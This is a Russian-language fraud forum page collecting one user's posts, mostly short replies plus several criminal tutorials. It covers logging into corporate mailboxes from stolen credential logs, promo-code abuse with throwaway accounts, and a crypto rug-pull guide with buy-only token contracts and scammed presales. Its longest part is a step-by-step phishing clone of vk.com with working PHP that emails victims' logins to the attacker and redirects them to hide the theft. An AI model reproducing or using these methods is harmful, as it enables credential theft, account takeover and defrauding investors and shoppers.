Перейти к публикации

helikop

Эксперт
  • Публикации

    174
  • Зарегистрирован

  • Посещение

  • Дней в лидерах

    2

Все публикации пользователя helikop

  1. Такие траблы у них бывают, замечал такое. Думаю пофиксят. Так как вчера на bep20 норм шло
  2. helikop

    куда вложить 5к$

    вложи в скам проект)
  3. helikop

    Казино с выводом на PayPal

    Все что слитое оно уже убитое и не работает
  4. в ютубе также если каналу с 10к подписчиками, например плеснуть 2к ботов в подписки. То исчезают оповещения о новых видео, стрим перестает отображаться слева в графе онлайна.
  5. helikop

    В какие игры вбивали?

    все дают и по сей день но не скажу на какие
  6. Все мы знаем, как зайти на почты gmail, mail.ru, yahoo, yandex и многие другие. Но что делать, если у тебя попался жирный лог с почтой на корпоративном домене? Разберёмся в этой статье. Первый вариант. Софт Mozilla Thunderbird Скачать можно тут: thunderbird. Всё, что необходимо - просто ввести почту, пароль и немного подождать. Если данных о данном домене не будет в базе софта, то он попытается эти данные подобрать. Зачастую это работает. У Mozilla Thunderbird есть один большой недостаток: если почта заспамлена и на ней ну ооочень много писем, то софт может зависнуть намертво.. работать с такой почтой крайне сложно. Для таких случаев есть некий аналог под названием Universal Imap Tool. Разработчик с соседнего форума и софт уже не поддерживает, но менее полезным и рабочим он от этого не стал. Скачать данный софт можно тут: download Ссылка на virustotal: vt Работает по тому же принципу, что и Thunderbird, только не умеет самостоятельно подбирать данные сервера и работает исключительно по своей базе. Всё предельно просто: вводите почту, пароль, кликаете дважды по 'Server' и если данные по домену есть в базе, то жмёте 'Войти'. Итак, с софтом мы разобрались. Но что делать, если данных по домену нет ни в Mozilla Thunderbird, ни в Universal Imap Tool? Тогда попробуем найти их самостоятельно. Вариант второй. Руками Предположим, что у нас есть почта [email protected] к которой привязан ну оочень жирный аккаунт. Попробовав зайти через Mozilla Thunderbird получаем ошибку, Universal Imap Tool тоже такого домена не знает.. Что делать? Главное - не отчаиваться. Письма же как-то доходят до таких ящиков, а значит что-то сделать можно. Каждый домен хранит в себе различную информацию, будь то информация о том, на каком сервере стоит сайт или же, куда присылать письма. Это называется NS-записи ( от англ. name servers ) и это абсолютно публичная информация. Нас интересуют исключительно записи типа MX, ибо именно они указывают сервер, на который нужно присылать письма. Проверить их можно как через консоль windows, так и банально через браузер. Для проверки NS записей мы воспользуемся онлайн утилитой от Google: https://toolbox.googleapps.com/apps/dig/ Переходим на сайт, вводим наш домен и выбираем записи которые нас интересуют, а именно MX. Через мгновение мы получаем ответ и тут есть несколько вариантов: 1. Видим что-то знакомое, вроде googleapis, google, yandex, hotmail, microsoft, yahoo и подобное. Тут вы сразу понимаете, к какому сервису привязана почта и можете попробовать на неё зайти, соответственно, через гугл, яндекс и т.д. 2. Видим что-то незнакомое, но с самим доменом не связанное, как в нашем случае. Мы видим домен plsmtp1.hushmail.com и именно на него приходят письма, отправленные на наш ящик. Тут нужно просто вычленить 'основной' сайт, перейти на него и попытаться найти web версию почты. В нашем случае всё предельно просто, сайт hushmail.com. Переходим и с легкостью находим страницу для входа в почту, это https://secure.hushmail.com/mail/. 3. Видим, что сервер так или иначе совпадает с доменом нашей почты. К примеру, ответ был бы, imap.cyber-rights.net . В таком случае это значит, что владелец домена имеет собственный сервер на котором настроен приём почты.. Обычно тут ничего не поделать.. Можно попытаться угадать адрес web почты, вроде cyber-rights.net/webmail/ или mail.cyber-rights.net, а можно попытаться самому подобрать адреса imap серверов, вроде imap.cyber-rights.net / mail.cyber-rights.net и т.п. Но дело это обычно довольно гиблое и безуспешное.
  7. helikop

    Скам в соц. сетях 2021

    можешь почитать тему про скам турков, была где-то
  8. helikop

    Безопасное общение

    юзай тг чтоб общаться с мамой бизнес только на жабе
  9. helikop

    refund с Алиэкспресса

    Я знаю шопы где-то такое может проканать
  10. helikop

    Ваша самая прибыльная тема

    Серая скам?
  11. В магазине «Adidas» началась акция Members Week, где на один из предложенных товаров мы можем получить скидку до 75%. 1. Скачиваем приложение «Adidas» (PlayMarket /AppStore ); 2. Открываем приложение и проходим регистрацию; 3. Нажимаем на иконку с человечком в правом верхнем углу; 4. Переходим в вкладку "Профиль" и листаем вниз до тех пор, пока не увидим надпись "Выиграй скидку до 50 процентов"; 5. Нажимаем на кнопку и принимаем участие; └ Иногда, возможно, у вас будет выдавать ошибку, но это решается перезапуском приложения. 6. Ждём положенное время (до 10 минут) и получаем скидку, которую мы применяем при заказе товара; └ Если нам выпало меньше 50% скидки, то выходим из аккаунта и создаём новый, проделывая операцию свыше. 7. PROFIT! Для того, что бы применить скидку выбираем товар из каталога "Готовы к учёбе", добавляем в корзину, после чего жмём "Оформить заказ", вкладку "Промокод" и вводим ваш полученный промокод! Для масштабирования рекомендую регистрировать аккаунты с помощью временной почты и вводить купоны на своём основном аккаунте
  12. helikop

    микрозайму

    По факту, только резидентам РФ
  13. helikop

    Эпл путает берега

    Apple будет искать запрещённые фото на устройствах пользователей Apple разработала новый инструмент для поиска изображений жестокого обращения с детьми и детской порнографии прямо на iPhone пользователей. Нейросеть будет распознавать запрещённые фото в памяти устройства. Как дела с приватностью?
  14. 1) ПК; 2) Кошелёк Metamask; 3) Аккаунт Binance; 4) 5-10$ в BNB SmartChain на создание контракта; Суть 1. Скачиваем расширение Metamask для браузера Chrome (тык); 2. Записываем секретную фразу, чтобы не потерять доступ к кошельку, после чего создаем сеть SmartChain; В правом верхнем углу нажимаем на "Сеть Etherium Mainnet" и нажимаем "Пользовательский RPC". Заполняем данные: 1. Smart Chain 2. https://bsc-dataseed.binance.org/ 3. 56 4. BNB И сохраняем. Теперь на нашем кошельке есть сеть SmartChain и мы можем закинуть монеты, после чего начать создание своего крипто-дерьма; 3. Переходим на биржу Binance и пополняем аккаунт примерно на 10$, чтобы купить монету BNB; 4. После покупки ставим на вывод купленные BNB на наш кошелёк Metamask; Вставляем наш адрес, и выбираем сеть BEP20. Создаем shitcoin Переходим по ссылке, нажимаем ПКМ по папке "Contracts" и создаем новый файл, называем как хотим, это не имеет значения. Теперь определимся с контрактом. Я остановлюсь на SafeMoon, т.к. у них хороший код и чистый контракт, а так же интересная система работы токена - 3% с каждой транзакции идет в ликвидность, и 2% распределяется по всем холдерам монеты, то есть людям постоянно будут капать монеты пассивно с каждой транзакции. Переходим по ссылке, копируем весь код, и вставляем его в remix.ethereum. В 722 и 723 строке кода меняем название нашей монеты. 722 - это полное название монеты, 723 - это символ нашей монеты. Так-же мы можем подчистить комментарии кода, т.к. там написано про другую крипту, ну или заменяем на свое название во всех строках. Decimals не трогаем, если не хотим потом капаться в коде чтобы поменять количество монет. Чем выше значение, тем меньше будет тотал саплай у монет, с каждой прибавленной 1 к 9, наших монет будет становиться на один ноль, меньше. Соответственно чем меньше Decimals тем больше монет. Переходим в Solidity Compiler: Ставим все значения как на этом скриншоте и компилируем. После этого выскакивает Metamask, и мы должны подключить его к ремиксу. Если не выскочил, обновляем страницу. Единственное что надо изменить, это над кнопкой деплой, выбрать не адрес, а SafeMoon. Коннектим, деплоим, и вуаля, наш контракт готов, монеты на вашем кошельке. Теперь узнаем адрес контракта нашей монеты. Снизу мы можем увидеть адрес, нажимаем на кнопку и он копируется. После чего заходим на этот сайт и проверяем свою монету введя адрес контракта в поиск. Можете добавить себе в кошелёк контракт монеты, чтобы видеть их на кошельке. Но пока-что монеты ничего не стоят, это ничем не обеспеченный фантик. Запускаем свою монету на децентрализованную биржу Переходим на сайт (регистрацию проходить не нужно) и коннектим наш Metamask с монетами к бирже. Нажимаем "далее" и подключаемся. В левом угла на сайте, в разделе Trade, выбираем Liquidity. И добавляем свои монеты в паре к BNB или BUSD (советую BNB так-как если он растет, значит ценность вашей крипты вместе с ним). Не закидываем все монеты в ликвид, 5-10% оставляем себе (все зависит от вашего решения, можно оставить себе хоть 50%) Чем больше BNB в паре к нашей монете, тем выше цена монеты. Выбираете BNB и нашу монету ниже. Нажимаем "создать ликвидность", и оплачиваем комиссию, после чего проводим транзакцию. Вуаля, теперь любой человек который зайдет на Панкейк, может ввести адрес контракта нашей монеты и купить её, тем самым подняв её цену. Ликвид пул Объясняю как работает ликвид-пул. Человек купил монет на 100$ соответственно пул увиличился на 100$, продал на 100$, значит пул уменьшился на 100$. Чем больше денег в ликвидности, тем лучше покупателю нашей монеты, т.к. он может купить на большую сумму. Если у нас в ликвидности всего 100$, то любой человек может выкупить огромную часть монет. Даже за 10$ он выкупит 10% от того что находится в пуле. Как заработать на этом? Если наша монета будет популярна и соберет кучу бабла в ликвид, то мы можем продать монеты и заработать на этом Так же можно просто вытянуть всю ликвидность в разделе ликвидности на панкейк, но различные сервисы видят, заблокирована ликвидность, или нет. Так что после этого только самые отбитые купят нашу монету. Еще один вариант - написать такой контракт, что купить монету можно, а продать нельзя, после чего собрать огромную аудиторию перед стартом, при этом не публикуя контракт, чтобы умники не просекли скам. После этого запускаем монету, все начнут ее покупать в первых рядах, а продать просто не смогут. Мы же просто вытягиваем ликвидность (для этого варианта нужно знать солидити язык). Что делать если нет денег на ликвидность? В этом случае, вам надо будет сделать пресейл вашей монеты. Есть различные площадки 1. DxSale - (не заскамить пресейл); 2. Bounce - (можно заскамить пресейл); Все по старинке, коннектим кошелёк к сервису и работаем. Что значит заскамить пресейл? В случае с DxSale он обезопасит инвесторов, и все деньги идут им, после чего они блокируются в ликвидности, можно настроить до 49%, которые мы можем забрать себе в кошелек. В случае с Bounce, все что купят, все пойдет на наш кошелёк, соответственно мы можем стартануть пресейл, собрать деньги с него, и просто кинуть всех. Общие рекомендации по продвижению 1. Вам обязательно нужны все возможные соц. сети, и вам надо их пиарить; 2. Обязательно нужен сайт. Чем красивее тем лучше; 3. Не палитесь что вы русский разраб, их ненавидят. Так что не регайте домен на рег ру; 4. Рекламируйтесь 7-8 дней перед пресейлом; 5. Не давайте поводов думать что вы скам проект; 6. Не берите рекламу на русскую аудиторию; 7. Есть возможность бесплатного провижения в TikTok, но нужно знать алгоритмы. Таким образом можно собрать огромную аудиторию.
  15. helikop

    Linux Mint + VMware у кого?

    Попробуй XFCE Mint
  16. helikop

    виндовс 11

    Я считаю луччше повременить
  17. helikop

    Хакинг блокчейна

    написал тебе, если гарант подойдет - куплю
  18. helikop

    Угоняем Telegram канал!

    а какой дурак сейчас не использую 2фа?
  19. Ну тут без спец-средств имея только ноут с линукс, через мониторинг сети wifi. Входящими в пакет aircrack-ng инструментами, airmon-ng, airodump-ng. Показывает все устройства с включённым wifi которые рядом , к каким именно сетям подключён, дальше по мощности сигнала ищем, ходим по этажу с ноутом. \.
  20. Нихао, скамерсанты! Сегодня я научу вас копировать совершенно любой сайт, для фишинга. Описал все подробно, так что проблем возникнуть не должно. Статья ориентирована на новичков в таких вещах, как html и php, но даже если вы разбираетесь в теме, можете почитать, может быть, найдёте что-то новое для себя. Данные, введённые на сайте будут отправляться на наш email. Для примера будем создавать копию vk.com. Подготовительные мероприятия Перед началом нам надо: определиться с тем, какой ресурс мы копируем завести новый ящик (не стоит использовать свой основной для получения данных) скачать Notepad++ (опционально, но настоятельно рекомендуется). На всякий случай: VT Готово? Начинаем. Скачиваем страницу входа Тут всё просто. Заходим на целевой сайт, нажимаем Ctrl+S, создаём для нашего сайта папку там, где нам нужно, выбираем "Страница (полностью)", пишем "index.html" и жмём кнопку Сохранить. Сделали? Отлично. В папке, созданной вами для сайта, появятся файлы и папки. В моём случае: Исправляем неправильно сохранённый сайт. Открываем index.html чтобы посмотреть, всё ли хорошо сохранилось. У меня, например, не всё. Сохранённый мною сайт выглядит так: В то время как оригинал - так: Всё хорошо, единственное отличие - картинки со смартфонами, они не сохранилась (картинки в целом, бывает, не сохраняются, это относится не только к вк). Сейчас исправим. Заходим на vk.com, нажимаем Ctrl+Shift+C, любимое сочетание клавиш у всех малолетних хацкеров, для изменения кода страницы. При наведении на элементы страницы они подсвечиваются, а при нажатии справа мы видим код этого элемента. Например, при нажатии на телефон слева: Сверху мы видим html код, а снизу - стили, применённые к объекту. Снизу Попытаемся понять, откуда же сайт берёт картинку. В коде элемента никаких ссылок на картинку нет, а вот в стилях, снизу, мы видим строку. Попытаемся понять, откуда же сайт берёт картинку. В коде элемента никаких ссылок на картинку нет, а вот в стилях, снизу, мы видим строкуКод HTML: background-image: url(/images/login/ru/reg_android_ru.png); и по этой ссылочке как раз и лежит изображение с телефоном. Нажмём ПКМ, затем Open in new tab: В новой вкладке открывается пикча. Нам необходимо получить ссылку на неё (также, как вариант, можно скачать её к себе в папку с сайтом, но в этом, я считаю, нет необходимости). Чтобы получить ссылку, как нетрудно догадаться, жмём на адресную строку нашего браузера и копируем находящееся там содержимое. Теперь, когда ссылка в наших руках, а вернее в нашем буфере обмена, мы открываем html-код сохранённой нами страницы. Для этого жмём ПКМ на файле index.html, затем тыкаем на Edit with Notepad++ в выпадающем меню. Код открыт. Теперь нам надо найти тот участок кода, что отвечает за смартфон слева. Для этого снова Ctrl+Shift+C на странице входа и снова тыкаем на смартфон слева. Справа начинает подсвечиваться такая строка с кодом: Нам надо найти эту же строку в скачанном сайте. Для этого делаем двойной клик по тексту, идущему после "class=", то есть мы будем искать объект с таким же классом. Копируем то, что выделилось (название класса), в моём случае "LoginMobilePromoDevice LoginMobilePromoDevice--android LoginMobilePromoDevice--ru". Заходим в Notepad++, жмём Ctrl+F, потом Ctrl+V, потом Enter. Повезло, совпадение всего одно, гадать не придётся: При сохранении сайта у этого элемента пропал стиль. Так вернём же его! Для этого в строке "<a class="LoginMobilePromoDevice LoginMobilePromoDevice--android LoginMobilePromoDevice--ru" target="_blank" href="https://play.google.com/store/apps/details?id=com.vkontakte.android">" перед символом ">" дописываем "style="background-image: url(https://st.vk.com/images/login/ru/reg_android_ru.png)"". Было: Код HTML: <a class="LoginMobilePromoDevice LoginMobilePromoDevice--android LoginMobilePromoDevice--ru" target="_blank" href="https://play.google.com/store/apps/details?id=com.vkontakte.android"> Стало: Код HTML: <a class="LoginMobilePromoDevice LoginMobilePromoDevice--android LoginMobilePromoDevice--ru" target="_blank" href="https://play.google.com/store/apps/details?id=com.vkontakte.android" style="background-image: url(https://st.vk.com/images/login/ru/reg_android_ru.png)"> Жмём на чтобы сохранить. Теперь снова открываем index.html в браузере и видим, что теперь там есть одна из пикч с телефонами. Теперь аналогичным образом возвращаем на своё законное (или не очень) место второй смартфон. Сама копия готова. Осталось направить данные из формы на наш email. Сама копия готова. Осталось направить данные из формы на наш email. Отправляем логин и пароль на email Теперь ищем в коде нашу форму для входа, вот эту: Для этого в Notepad++ жмём Ctrl+F и пишем "Телефон или email". Эти серые буквы в текстовом поле, которые исчезают когда пользователь начинает что-то писать называются placeholder. Так что первое, что нашлось в коде ( ) нам не подходит. Нажимаем "Найти далее" и уже теперь мы находим нужную нам строку, а именно « », строка и отвечает за поле ввода, которое мы видим на странице входа, вот это: Из этой строки нам понадобится запомнить, чему равен аргумент name, в данном случае его значение - email. Рядом есть такая строка: В ней тоже смотрим чему равен name, видим, что name="pass", запоминаем это значение. Теперь сама отправка на email. Создадим в папке сайта файл login.php(для этого создаём .txt файл и меняем в нём расширение и название). Открываем его с помощью Notepad'a и вставляем туда этот код, меняя некоторые данные на те, что нужны вам: Код PHP: <?php $message = $_POST['email'] . ':' . $_POST['pass']; //это (в кавычках) те самые значения аргумента name, которые мы запоминали. Если вы копируете какой-то другой сайт, то замените значения на свои $message = wordwrap($message, 70, "<br>"); mail('[email protected]', 'Vk', $message, "From: [email protected]"); //первую почту ([email protected]) на свою меняйте, вторую ([email protected]) - не трогайте ?>//Да, очень устаревший способ для отправки email'а, но так будет быстрее всего. Письма сразу ищите в папке спама. Email отправили, теперь, чтобы было не так палевно, добавим перед ?> еще одну строку, которая перенаправит жертву на адрес https://vk.com/login?m=1 (это уже сам вк), на котором он увидит, что неправильно ввел пароль, введёт его ещё раз, зайдёт в свой акк, поймёт, что всё норм и навсегда забудет про этот случай. Так вот, строка, которую надо добавить: Код PHP: header('Location: https://vk.com/login?m=1'); В итоге получилось: Код PHP: <?php $message = $_POST['email'] . ':' . $_POST['pass']; $message = wordwrap($message, 70, "<br>"); mail('[email protected]', 'Vk', $message, "From: [email protected]"); header('Location: https://vk.com/login?m=1'); ?> Сохраняем этот файл, напомню, с названием login.php в папку сайта. Вернёмся к index.html. Мы не сделали ничего, чтобы при нажатии кнопки Войти открывался именно файл login.php. Исправим это. Помните, как мы искали форму по тексту "Телефон или email"? Так вот, вернёмся к тому месту в коде. Оно выглядит так: А синей стрелкой показана та страница, на которую перенаправляется пользователь после нажатия на кнопку "Войти". Меняем этот адрес на login.php. Вот, так-то лучше: Тестируем наш сайт-копию локально Попробуем запустить сайт локально, то есть просто дважды тыкнем на index.html. Надо понимать, что локально .php файл должным образом работать не будет, но об этом чуть позже. Пока что откроем index.html. Для теста напишем рандомные символы в поля логина и пароля: Жмём на кнопку Войти, она принимает такой вид: И потом, после долгой загрузки, мы видим это: Не повезло не повезло. Но нас так просто не остановишь, так ведь? Снова открываем index.html в Notepad, снова жмём Ctrl+F, ну и, как вы, вероятно, догадались, пишем туда фрагмент из текста предупреждения, например "Не удаётся пройти авторизацию по". Всего одно совпадение на весь код, отлично. Удалим отсюда строку {"globalWarning":"Предупреждениe","globalHttpsRequestError":"Не удаётся пройти авторизацию по защищённому соединению. Чаще всего это происходит, когда на вашем компьютере установлены неправильные текущие дата и время. Пожалуйста, проверьте настройки даты и времени в системе и перезапустите браузер."}, сохраним, снова откроем index.html, снова введём данные, снова жмякаем по кнопке Войти и теперь уже нас перенаправляет на страницу login.php. Отлично. Вместо страницы, правда, откроется сам код, а email никуда не отправится, но так и должно быть, потому что сайт сейчас всё ещё у нас на компе. Так что продолжим. Загружаем всё на хостинг Для тестирования подобных штук нормальные люди создают локальный сервер, используют какие-то там апачи, вроде как, но я, так уж вышло, к нормальным не отношусь, поэтому юзаю бесплатный хостинг чтобы тестить свои шизофренические коды на php. Вы можете использовать любой хостинг, но он обязательно должен поддерживать php. После регистрации на хостинге открываем File Manager и закидываем в папку public_html наши файлы из папки с сайтом Может возникнуть проблема с кодировкой, у меня вот возникла: Чтобы пофиксить, надо просто открыть в File Manager наш .html-файл и скопировать весь код из Notepad'a сюда. После жмём save&close, обновляем страницу и видим, что проблема исчезла: На бесплатном хостинге всё тестим, а дальше сами разберётесь, куда свой сайт пихать. Вот, в общем-то, и всё. Надеюсь, у вас всё получилось. Удачи!
×
×
  • Создать...